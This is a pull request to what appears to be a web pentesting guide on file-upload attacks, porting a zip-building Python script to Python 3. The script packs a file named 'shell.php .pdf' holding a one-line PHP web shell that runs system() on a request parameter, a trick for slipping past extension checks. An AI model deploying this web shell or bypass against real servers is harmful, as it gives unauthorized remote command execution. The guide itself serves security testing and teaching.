### PR TITLE
Update file-upload.md / Replace cStringIO by io

### DIFF
--- a/pentesting-web/file-upload.md
+++ b/pentesting-web/file-upload.md
@@ -222,13 +222,11 @@ Sometimes an application will block the loading of a file by checking its extens
 We can reuse the previous script to make a zip file.
 
 ```python
-#!/usr/bin/python
-
 import zipfile
-from cStringIO import StringIO
+from io import BytesIO
 
 def create_zip():
-    f = StringIO()
+    f = BytesIO()
     z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
     z.writestr('shell.php .pdf', '<?php echo system($_REQUEST["cmd"]); ?>')
     z.close()


### PR DESCRIPTION
Originally, I wrote the script for the little trick "Decompress with a different name" with the module "cStringIo". I don't remember why exactly, but when tested again at home to write about this trick, I found that cStringIO is not present anymore on python3. It works with python2.7, but `io` is better because it works with both modules.

And, I wrote " we can reuse the previous script". That's not true haha !

I think it is better to keep consistency with your previous work, and have better compatibility with differents python version.

Let me know if it's ok for you. Thanks !